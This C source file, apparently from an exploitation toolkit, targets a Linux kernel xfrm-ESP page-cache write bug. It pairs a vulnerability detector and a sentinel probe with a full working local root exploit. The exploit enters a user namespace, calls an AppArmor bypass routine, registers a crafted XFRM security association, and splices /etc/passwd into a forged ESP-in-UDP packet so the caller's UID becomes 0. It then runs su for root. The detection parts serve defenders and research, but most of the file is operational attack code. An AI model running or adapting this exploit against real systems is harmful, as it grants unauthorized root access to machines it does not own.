Files
SKELETONKEY/modules/copy_fail_family/dirtyfrag_esp.c
T

805 lines
30 KiB
C

/*
* DIRTYFAIL — dirtyfrag_esp.c — Dirty Frag xfrm-ESP variant
* CVE-2026-43284
*
* BACKGROUND
* ----------
* In Linux, esp_input() runs the AEAD decryption in-place on the
* incoming skb. Before that, an skb whose payload sits in a frag (i.e.
* not in the linear head — the case that arises when userspace plants
* a page via splice()) is supposed to be cloned out into kernel-owned
* memory by skb_cow_data(). The bug:
*
* if (!skb_cloned(skb)) {
* if (!skb_is_nonlinear(skb)) {
* nfrags = 1;
* goto skip_cow;
* } else if (!skb_has_frag_list(skb)) {
* nfrags = skb_shinfo(skb)->nr_frags;
* nfrags++;
* goto skip_cow; // <-- vulnerable branch
* }
* }
*
* If the skb has frags but no frag_list, esp_input skips the COW and
* runs in-place AEAD on the user-supplied page. The same authencesn
* scratch-write that powers Copy Fail then lands at file offset
* (assoclen + cryptlen) inside that page. The 4 STOREd bytes are
* `seq_hi` from the SA's replay_esn state, which userspace controls
* via XFRMA_REPLAY_ESN_VAL on SA registration.
*
* Net result: same 4-byte arbitrary-offset write into a page-cache
* page as Copy Fail, but reachable via the xfrm path *even when
* algif_aead is blacklisted as a Copy Fail mitigation*.
*
* COST: registering an XFRM SA needs CAP_NET_ADMIN, so the attacker
* must enter a fresh user namespace first. This is allowed by default
* on most distros except hardened Ubuntu (AppArmor restrict_unprivileged_userns).
*
* DETECTION STRATEGY
* ------------------
* Precondition-based: we report VULNERABLE when *all* of these hold:
* - kernel >= 4.10 (commit cac2661c53f3, 2017-01-17) and not patched
* - esp4 module loadable (we don't insmod; rely on autoload)
* - unprivileged user namespace creation works
*
* Avoiding the actual primitive in detect mode keeps the system
* undisturbed (no namespaces created in the parent, no encap sockets,
* no transient SAs). The exploit path runs the full primitive for real.
*
* EXPLOIT STRATEGY
* ----------------
* Same UID-flip as Copy Fail, but driven through xfrm:
*
* 1. fork() — parent stays in init userns to call su afterwards
* 2. child: unshare(CLONE_NEWUSER | CLONE_NEWNET)
* 3. child: write deny → /proc/self/setgroups
* 4. child: write "0 <real_uid> 1" → /proc/self/uid_map (and gid_map)
* 5. child: ioctl SIOCSIFFLAGS to bring lo UP
* 6. child: open NETLINK_XFRM, register SA with:
* proto=ESP, mode=TRANSPORT, flags=XFRM_STATE_ESN,
* alg=authencesn(hmac(sha256),cbc(aes)) (zero keys),
* encap=ESPINUDP sport=dport=4500,
* replay_esn.seq_hi = "0000" (the 4 bytes that will land)
* 7. child: open udp_recv @ 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP
* and udp_send connected to 127.0.0.1:4500
* 8. child: pipe(); vmsplice forged ESP wire header (24 bytes) →
* splice /etc/passwd at uid_off, len 16 → splice pipe → udp_send
* 9. child: recvmsg drives the kernel through the esp_input path,
* firing the 4-byte STORE of "0000" into /etc/passwd
* at the user's UID offset
* 10. child: exits, parent verifies via fresh open of /etc/passwd
* 11. parent: execlp("su", username) — PAM checks /etc/shadow on
* disk (untouched), gets right password, setuid(0) lands
* us at root because the page-cache copy of /etc/passwd
* now lists us as UID 0.
*/
#include "dirtyfrag_esp.h"
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <pwd.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>
#ifdef __linux__
#include <sys/syscall.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>
#include <linux/if.h>
#include <sys/ioctl.h>
#endif
/* UDP_ENCAP / UDP_ENCAP_ESPINUDP live in <linux/udp.h>, but that header
* conflicts with <netinet/udp.h> over `struct udphdr` and we don't
* actually need the struct. The kernel constants are stable, so we
* just hard-code them as fallbacks (the #ifndef makes this a no-op if
* the toolchain happens to expose them already). */
#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef IPPROTO_ESP
#define IPPROTO_ESP 50
#endif
#ifndef __linux__
#define CLONE_NEWUSER 0x10000000
#define CLONE_NEWNET 0x40000000
#define IFF_UP 0x01
#define IFF_RUNNING 0x40
#define SIOCSIFFLAGS 0x8914
struct sockaddr_in { int dummy; };
struct ifreq { int dummy; };
__attribute__((unused))
static ssize_t splice (int a, void *b, int c, void *d, size_t e, unsigned f)
{ (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return -1; }
__attribute__((unused))
static ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, unsigned d)
{ (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; }
__attribute__((unused))
static int ioctl (int a, unsigned long b, ...)
{ (void)a;(void)b; errno=ENOSYS; return -1; }
#else
extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out,
size_t len, unsigned int flags);
extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr,
unsigned int flags);
#endif
#define ENCAP_PORT 4500
#define ESP_SPI 0xDEADBE10
#define MARKER "0000"
#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))"
/* ---------------------------------------------------------------- *
* Detection
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_detect(void)
{
log_step("Dirty Frag — xfrm-ESP variant (CVE-2026-43284) — detection");
int km = -1, kn = -1;
if (kernel_version(&km, &kn))
log_hint("kernel %d.%d.x", km, kn);
/* The vulnerable branch was introduced in 2017 (cac2661c53f3) and
* the upstream fix is f4c50a4034e6 (2026-05-07). We can't easily
* tell whether a particular distro kernel has the backport, so we
* report based on prereq presence and let the operator decide. */
/* esp4 / esp6 modules. They autoload on first XFRM SA registration,
* but we want to know if the build supports them at all. /proc/modules
* lists currently-loaded; that's a strong positive signal. */
bool esp4 = kmod_loaded("esp4");
bool esp6 = kmod_loaded("esp6");
log_hint("esp4 currently loaded: %s", esp4 ? "yes" : "no");
log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no");
bool userns = unprivileged_userns_allowed();
log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED");
if (!userns) {
log_ok("xfrm-ESP variant unreachable without unprivileged userns");
log_hint("on Ubuntu, this is the expected hardening — but the RxRPC "
"variant of Dirty Frag may still be reachable. Run with "
"--check-rxrpc.");
return DF_PRECOND_FAIL;
}
if (!esp4 && !esp6) {
log_hint("no esp4/esp6 currently loaded; the kernel will autoload them "
"on first SA registration. We treat this as still vulnerable.");
}
/* On hardened distros (Ubuntu 26.04+) caps are stripped inside the
* userns even after our bypass — kernel may still have the bug but
* unprivileged users can't reach it. Report that honestly rather
* than claiming VULNERABLE. */
if (apparmor_userns_caps_blocked()) {
log_ok("LSM-mitigated — kernel may still have the bug but the AppArmor "
"policy denies CAP_NET_ADMIN inside any unprivileged userns.");
log_hint("unprivileged exploitation is blocked; real root can still "
"reach the kernel bug. Apply the kernel patch as soon as your "
"distro ships it.");
return DF_PRECOND_FAIL;
}
if (dirtyfail_active_probes) {
log_step("--active set: firing v4 ESP-in-UDP trigger against /tmp sentinel");
df_result_t pr = dirtyfrag_esp_active_probe();
if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr;
log_warn("active probe inconclusive — falling back to precondition verdict");
}
log_warn("VULNERABLE (preconditions met) — userns + xfrm SA registration "
"available, kernel within affected window");
log_warn("apply mainline patch f4c50a4034e6 or your distro's backport");
log_warn("interim mitigation: `dirtyfail --mitigate` or manually blacklist "
"esp4/esp6 in /etc/modprobe.d/");
log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe");
return DF_VULNERABLE;
}
/* ---------------------------------------------------------------- *
* Exploit — only compiled with full bodies on Linux.
* ---------------------------------------------------------------- */
#ifdef __linux__
/* Write a small string to a /proc file. */
static bool write_proc(const char *path, const char *value)
{
int fd = open(path, O_WRONLY);
if (fd < 0) return false;
ssize_t want = strlen(value);
ssize_t got = write(fd, value, want);
close(fd);
return got == want;
}
/* ---- Netlink XFRM SA registration --------------------------------- *
*
* The XFRM SA registration is built by hand. Each attribute is a 4-byte
* aligned struct rtattr { u16 rta_len; u16 rta_type; } followed by
* payload. The total nlmsg length is filled in last.
*
* Register an XFRM_MSG_NEWSA carrying our marker in replay_esn.seq_hi.
*/
static bool xfrm_register_sa(int nl, const unsigned char seq_hi[4])
{
char buf[2048] = {0};
struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
struct xfrm_usersa_info *usa =
(struct xfrm_usersa_info *)NLMSG_DATA(nlh);
nlh->nlmsg_type = XFRM_MSG_NEWSA;
nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
nlh->nlmsg_seq = 1;
/* Selector: src/dst 127.0.0.1, IPv4 */
usa->sel.daddr.a4 = htonl(0x7f000001);
usa->sel.saddr.a4 = htonl(0x7f000001);
usa->sel.family = AF_INET;
usa->sel.prefixlen_d = 32;
usa->sel.prefixlen_s = 32;
usa->id.daddr.a4 = htonl(0x7f000001);
usa->id.spi = htonl(ESP_SPI);
usa->id.proto = IPPROTO_ESP;
usa->saddr.a4 = htonl(0x7f000001);
usa->lft.soft_byte_limit = (uint64_t)-1;
usa->lft.hard_byte_limit = (uint64_t)-1;
usa->lft.soft_packet_limit = (uint64_t)-1;
usa->lft.hard_packet_limit = (uint64_t)-1;
usa->reqid = 0x1234;
usa->family = AF_INET;
usa->mode = XFRM_MODE_TRANSPORT;
usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */
usa->flags = XFRM_STATE_ESN;
size_t hdrlen = sizeof(*nlh) + sizeof(*usa);
size_t attrs = 0;
char *abuf = buf + hdrlen;
/*
* The kernel's xfrm code does NOT accept `authencesn(...)` as a
* single XFRMA_ALG_AEAD attribute — it's a composition that has
* to be assembled from separate auth + crypt parts. We register:
* XFRMA_ALG_AUTH_TRUNC : hmac(sha256) with 32-byte key, 128-bit ICV
* XFRMA_ALG_CRYPT : cbc(aes) with 16-byte key
*
* The kernel internally wires these into authencesn(hmac(sha256),
* cbc(aes)) when it sees XFRM_STATE_ESN on the SA.
*/
{ /* XFRMA_ALG_AUTH_TRUNC */
struct xfrm_algo_auth *aa;
unsigned short dlen = sizeof(*aa) + 32; /* HMAC-SHA256 key */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_AUTH_TRUNC;
r->rta_len = RTA_LENGTH(dlen);
aa = (struct xfrm_algo_auth *)RTA_DATA(r);
memset(aa, 0, dlen);
strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
aa->alg_key_len = 32 * 8; /* bits */
aa->alg_trunc_len = 128; /* bits — truncated MAC width */
attrs += RTA_SPACE(dlen);
}
{ /* XFRMA_ALG_CRYPT */
struct xfrm_algo *ea;
unsigned short dlen = sizeof(*ea) + 16; /* AES-128 key */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_CRYPT;
r->rta_len = RTA_LENGTH(dlen);
ea = (struct xfrm_algo *)RTA_DATA(r);
memset(ea, 0, dlen);
strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
ea->alg_key_len = 16 * 8;
attrs += RTA_SPACE(dlen);
}
/* XFRMA_REPLAY_ESN_VAL — this is where seq_hi rides */
{
struct xfrm_replay_state_esn *esn;
unsigned short dlen = sizeof(*esn) + 4; /* bmp_len * 4 = 4 */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_REPLAY_ESN_VAL;
r->rta_len = RTA_LENGTH(dlen);
esn = (struct xfrm_replay_state_esn *)RTA_DATA(r);
memset(esn, 0, dlen);
esn->bmp_len = 1;
esn->oseq = 0;
esn->seq = 100;
esn->oseq_hi = 0;
memcpy(&esn->seq_hi, seq_hi, 4); /* THE PRIMITIVE INPUT */
esn->replay_window = 32;
attrs += RTA_SPACE(dlen);
}
/* XFRMA_ENCAP — UDP encapsulation, sport=dport=4500 */
{
struct xfrm_encap_tmpl *enc;
unsigned short dlen = sizeof(*enc);
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ENCAP;
r->rta_len = RTA_LENGTH(dlen);
enc = (struct xfrm_encap_tmpl *)RTA_DATA(r);
memset(enc, 0, dlen);
enc->encap_type = UDP_ENCAP_ESPINUDP;
enc->encap_sport = htons(ENCAP_PORT);
enc->encap_dport = htons(ENCAP_PORT);
enc->encap_oa.a4 = 0;
attrs += RTA_SPACE(dlen);
}
nlh->nlmsg_len = hdrlen + attrs;
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
if (sendto(nl, buf, nlh->nlmsg_len, 0,
(struct sockaddr *)&nladdr, sizeof(nladdr)) < 0)
return false;
/* Drain ACK */
char ack[4096];
ssize_t n = recv(nl, ack, sizeof(ack), 0);
if (n < (ssize_t)sizeof(struct nlmsghdr)) return false;
struct nlmsghdr *r = (struct nlmsghdr *)ack;
if (r->nlmsg_type == NLMSG_ERROR) {
struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r);
if (e->error != 0) {
log_bad("XFRM_MSG_NEWSA: %s", strerror(-e->error));
return false;
}
}
return true;
}
/* Bring loopback up inside the new netns. */
static bool bring_lo_up(void)
{
int s = socket(AF_INET, SOCK_DGRAM, 0);
if (s < 0) return false;
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
ifr.ifr_flags = IFF_UP | IFF_RUNNING;
int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
close(s);
return rc == 0;
}
/* Trigger esp_input by sending a forged ESP-in-UDP packet whose payload
* is a page-cache page from `target_path`, planted via splice at
* `splice_off`. The kernel STORE lands ~14 bytes into the spliced
* region (the v4 path has no V6_STORE_SHIFT-style offset). */
static bool trigger_store_at(const char *target_path, loff_t splice_off)
{
/* udp_recv: bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP set so
* incoming UDP frames are rerouted into xfrm_input -> esp_input. */
int udp_recv = socket(AF_INET, SOCK_DGRAM, 0);
if (udp_recv < 0) return false;
struct sockaddr_in addr = {
.sin_family = AF_INET,
.sin_port = htons(ENCAP_PORT),
.sin_addr.s_addr = htonl(0x7f000001),
};
int reuse = 1;
setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("bind udp_recv: %s", strerror(errno));
close(udp_recv); return false;
}
int encap = UDP_ENCAP_ESPINUDP;
if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
log_bad("UDP_ENCAP_ESPINUDP: %s", strerror(errno));
close(udp_recv); return false;
}
/* udp_send: connect to udp_recv. Packets we splice here will arrive
* at udp_recv via loopback and feed xfrm_input. */
int udp_send = socket(AF_INET, SOCK_DGRAM, 0);
if (udp_send < 0) { close(udp_recv); return false; }
if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("connect udp_send: %s", strerror(errno));
close(udp_recv); close(udp_send); return false;
}
/* Build wire ESP header: SPI(4) || seq_no(4) || IV(16) = 24 bytes.
* IV value doesn't matter — auth check fails after the STORE. */
unsigned char wire_hdr[24];
*(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI);
*(uint32_t *)(wire_hdr + 4) = htonl(101); /* seq_no_lo */
memset(wire_hdr + 8, 0xCC, 16);
/* Open the target file for splicing. */
int pfd = open(target_path, O_RDONLY);
if (pfd < 0) {
log_bad("open %s: %s", target_path, strerror(errno));
close(udp_recv); close(udp_send); return false;
}
int p[2];
if (pipe(p) < 0) {
log_bad("pipe: %s", strerror(errno));
close(pfd); close(udp_recv); close(udp_send); return false;
}
/* vmsplice the wire header into the pipe (24 bytes). */
struct iovec iov = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) };
if (vmsplice(p[1], &iov, 1, 0) != (ssize_t)sizeof(wire_hdr)) {
log_bad("vmsplice header: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
/* splice 16 bytes of target's page cache from splice_off. */
loff_t off = splice_off;
if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) {
log_bad("splice file->pipe: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
/* splice the whole 40-byte payload from pipe to udp_send. */
if (splice(p[0], NULL, udp_send, NULL, 24 + 16, SPLICE_F_MOVE) != 40) {
log_bad("splice pipe->udp: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
close(p[0]); close(p[1]);
/* Drive the receive — esp_input runs inline here, performs the
* scratch-write, and we don't really care about the actual recv
* data (auth will fail with EBADMSG).
*
* The usleep gives the kernel a hard guarantee that the in-place
* decrypt has finished and the page-cache STORE is visible before
* we tear down the sockets. On a busy or slow VM, splice() can
* return before esp_input has actually fired. V4bel's reference
* exploit uses the same 150ms wait. */
usleep(150 * 1000);
unsigned char drain[256];
(void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT);
close(pfd);
close(udp_recv);
close(udp_send);
return true;
}
/* Compatibility wrapper for the exploit path: target /etc/passwd. */
static bool trigger_store(off_t passwd_off)
{
return trigger_store_at("/etc/passwd", passwd_off);
}
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) {
log_bad("unshare: %s", strerror(errno));
return 1;
}
if (!write_proc("/proc/self/setgroups", "deny")) {
log_bad("setgroups deny: %s", strerror(errno));
return 1;
}
char map[64];
snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_uid);
if (!write_proc("/proc/self/uid_map", map)) {
log_bad("uid_map: %s", strerror(errno));
return 1;
}
snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_gid);
if (!write_proc("/proc/self/gid_map", map)) {
log_bad("gid_map: %s", strerror(errno));
return 1;
}
if (!bring_lo_up()) {
log_bad("bring lo up: %s", strerror(errno));
return 1;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("AF_NETLINK XFRM: %s", strerror(errno));
return 1;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("bind netlink: %s", strerror(errno));
close(nl); return 1;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return 1;
}
log_ok("XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store(passwd_off)) {
log_bad("trigger failed");
close(nl); return 1;
}
log_ok("ESP-in-UDP trigger fired");
close(nl);
return 0;
}
#else /* __linux__ */
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
(void)passwd_off; (void)real_uid; (void)real_gid;
return 1;
}
#endif
/* ---------------------------------------------------------------- *
* INNER — runs in the AA bypass userns (post-stage 2).
*
* No user interaction, no fork, no verify, no su. Just the kernel
* work: open netlink, register SA, fire splice trigger, exit.
* The parent (init ns) owns everything else.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_exploit_inner(void)
{
#ifdef __linux__
const char *user = getenv("DIRTYFAIL_TARGET_USER");
if (!user || !*user) {
log_bad("inner: DIRTYFAIL_TARGET_USER not set");
return DF_TEST_ERROR;
}
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("inner: find_passwd_uid_field('%s') failed", user);
return DF_TEST_ERROR;
}
if (uid_len != 4) {
log_bad("inner: UID '%s' is %zu chars; need 4", uid_str, uid_len);
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("inner: AF_NETLINK XFRM: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("inner: bind netlink: %s", strerror(errno));
close(nl);
return DF_EXPLOIT_FAIL;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl);
return DF_EXPLOIT_FAIL;
}
log_ok("inner: XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store(uid_off)) {
close(nl);
return DF_EXPLOIT_FAIL;
}
log_ok("inner: ESP-in-UDP trigger fired at uid_off=%lld",
(long long)uid_off);
close(nl);
return DF_EXPLOIT_OK;
#else
log_bad("dirtyfrag_esp_exploit_inner: Linux-only");
return DF_TEST_ERROR;
#endif
}
/* ---------------------------------------------------------------- *
* OUTER — runs in init namespace.
*
* Prompts the operator, sets env vars, fork → child arms AA bypass
* and runs the inner. Parent stays in init ns, waits, reads the
* global page cache to verify, then either:
* - do_shell=true: execlp("su", user) — runs in init ns →
* PAM reads modified /etc/passwd → uid 0 → real init-ns root
* - do_shell=false: try_revert_passwd_page_cache, return.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_exploit(bool do_shell)
{
log_step("Dirty Frag (xfrm-ESP) — exploit");
uid_t uid = getuid();
if (uid == 0) {
log_warn("already root in init namespace — nothing to escalate");
return DF_OK;
}
struct passwd *pw = getpwuid(uid);
if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; }
const char *user = pw->pw_name;
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("could not find %s in /etc/passwd", user);
return DF_TEST_ERROR;
}
log_step("/etc/passwd UID for %s: '%s' at offset %lld",
user, uid_str, (long long)uid_off);
if (uid_len != 4) {
log_bad("UID '%s' is %zu chars; this technique needs exactly 4",
uid_str, uid_len);
return DF_TEST_ERROR;
}
log_warn("about to run xfrm-ESP page-cache write against /etc/passwd");
log_warn("this enters a fresh user/net namespace, registers an XFRM SA, "
"and sends an ESP-in-UDP packet whose payload is the /etc/passwd "
"page from offset %lld", (long long)uid_off);
log_warn("on success the page cache will report '%s' as UID 0", user);
log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`");
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined — aborting");
return DF_OK;
}
if (!ssh_lockout_check(user)) {
log_bad("SSH-lockout confirmation declined — aborting");
return DF_OK;
}
/* Hand off to the inner via env vars + AA bypass fork.
*
* The child fork enters the bypass userns, runs
* dirtyfrag_esp_exploit_inner (dispatched from main() based on
* DIRTYFAIL_INNER_MODE), modifies the global page cache, exits.
* We (parent, init ns) read the result via the same global page
* cache and execlp(su) here in init ns for REAL root. */
setenv("DIRTYFAIL_INNER_MODE", "esp", 1);
setenv("DIRTYFAIL_TARGET_USER", user, 1);
int rc = apparmor_bypass_fork_arm(0, NULL); /* argc/argv unused for forked variant */
if (rc != DF_EXPLOIT_OK) {
log_bad("inner exploit failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
/* Verify in init namespace — page cache is global, so we see the
* child's modification here. */
int v = open("/etc/passwd", O_RDONLY);
if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
char land[5] = {0};
if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
close(v);
if (memcmp(land, MARKER, 4) != 0) {
log_bad("write did not land — page cache reads '%.4s'", land);
return DF_EXPLOIT_FAIL;
}
log_ok("page cache now reports %s with uid 0", user);
if (!do_shell) {
if (try_revert_passwd_page_cache())
log_ok("page cache reverted (--no-shell)");
else
log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
return DF_EXPLOIT_OK;
}
log_ok("invoking 'su %s' in init namespace — enter your password for REAL root", user);
execlp("su", "su", user, (char *)NULL);
log_bad("execlp: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
/* ---------------------------------------------------------------- *
* Active probe — used by `--scan --active`.
*
* Same userns + XFRM SA + splice-trigger setup as the exploit, but
* targets a sentinel file in /tmp instead of /etc/passwd. The parent
* (init ns) reads the sentinel after the child returns and looks for
* the marker bytes.
*
* If the marker landed → kernel STORE is reachable → DF_VULNERABLE.
* If the page is intact → kernel is patched → DF_OK.
* If AA blocks the bypass → DF_PRECOND_FAIL.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_active_probe_inner(void)
{
#ifdef __linux__
const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL");
if (!sentinel || !*sentinel) {
log_bad("active-probe: DIRTYFAIL_PROBE_SENTINEL not set");
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("active-probe: netlink xfrm: %s", strerror(errno));
return DF_TEST_ERROR;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("active-probe: bind netlink: %s", strerror(errno));
close(nl); return DF_TEST_ERROR;
}
if (!bring_lo_up()) {
log_bad("active-probe: bring lo up: %s", strerror(errno));
close(nl); return DF_TEST_ERROR;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return DF_TEST_ERROR;
}
if (!trigger_store_at(sentinel, 0)) {
close(nl); return DF_TEST_ERROR;
}
close(nl);
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
df_result_t dirtyfrag_esp_active_probe(void)
{
/* Sentinel file: 4 KiB of 'A' bytes. */
char tmpl[] = "/tmp/dirtyfail-esp-probe.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) { log_bad("probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; }
unsigned char filler[4096];
memset(filler, 'A', sizeof(filler));
if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) {
close(sfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(sfd);
/* Fault the page in. */
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
char tmp[4096];
if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) {
close(rfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(rfd);
setenv("DIRTYFAIL_INNER_MODE", "esp-probe", 1);
setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
unsetenv("DIRTYFAIL_INNER_MODE");
unsetenv("DIRTYFAIL_PROBE_SENTINEL");
if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; }
if (rc != DF_EXPLOIT_OK) {
log_bad("active-probe inner failed (exit=%d)", rc);
unlink(tmpl); return DF_TEST_ERROR;
}
/* Re-read sentinel and search for marker. */
rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
unsigned char after[64];
ssize_t got = read(rfd, after, sizeof(after));
close(rfd);
unlink(tmpl);
if (got <= 0) return DF_TEST_ERROR;
for (int i = 0; i + 4 <= got; i++) {
if (memcmp(after + i, MARKER, 4) == 0) {
log_warn("ACTIVE PROBE: STORE landed at offset %d → kernel is VULNERABLE", i);
return DF_VULNERABLE;
}
}
log_ok("ACTIVE PROBE: page intact — kernel ESP path appears patched");
return DF_OK;
}